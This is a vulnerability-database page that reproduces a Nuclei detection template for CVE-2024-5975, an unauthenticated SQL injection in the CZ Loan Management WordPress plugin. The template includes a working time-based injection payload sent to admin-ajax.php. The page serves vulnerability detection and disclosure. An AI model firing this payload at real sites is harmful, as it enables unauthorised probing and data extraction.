Lucene search
K

CZ Loan Management <= 1.1 - SQL Injection

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 36 Views

CZ Loan Management plugin <= 1.1 - SQL Injection vulnerability through AJAX actio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-5975
30 Jul 202409:02
circl
CNNVD
WordPress plugin CZ Loan Management 安全漏洞
30 Jul 202400:00
cnnvd
CVE
CVE-2024-5975
30 Jul 202406:00
cve
Cvelist
CVE-2024-5975 CZ Loan Management <= 1.1 - Unauthenticated SQLi
30 Jul 202406:00
cvelist
NVD
CVE-2024-5975
30 Jul 202406:15
nvd
OSV
CVE-2024-5975
30 Jul 202406:15
osv
Patchstack
WordPress CZ Loan Management plugin <= 1.1 - Unauthenticated SQLi vulnerability
30 Jul 202406:40
patchstack
Patchstack
WordPress CZ Loan Management Plugin <= 1.1 is vulnerable to SQL Injection
30 Jul 202400:00
patchstack
Positive Technologies
PT-2024-37286 · WordPress · Cz Loan Management
30 Jul 202400:00
ptsecurity
RedhatCVE
CVE-2024-5975
23 May 202508:59
redhatcve
Rows per page
id: CVE-2024-5975

info:
  name: CZ Loan Management <= 1.1 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    The CZ Loan Management WordPress plugin through 1.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
  impact: |
    Unauthenticated attackers can execute time-based SQL injection to extract sensitive database information including user credentials and loan management data.
  remediation: |
    Update CZ Loan Management plugin to version 1.2 or later to address the SQL injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5975
    - https://wpscan.com/vulnerability/68f81943-b007-49c8-be9c-d0405b2ba4cf/
    - https://vuldb.com/?id.272929
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-5975
    epss-score: 0.01958
    epss-percentile: 0.77862
  metadata:
    vendor: team-contriverz
    product: cz-loan-management
    framework: wordpress
    publicwww-query: "/wp-content/plugins/cz-loan-management"
  tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,wp,cz-loan-management,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"CZ Loan Management")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        @timeout 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=cz_plugin_for_user_get_percentage&selectedperiod=(select*from(select(sleep(6)))a)

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - 'contains(content_type,"text/html")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100c3944f81f5723fbc59b35b2a8d61055122a13809ac0b68678ffc1ccc03d93e780220777d1cd3541205e413d06e5cc365933759380e167f18f733d973aa966120202d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.1
EPSS0.01958
SSVC
36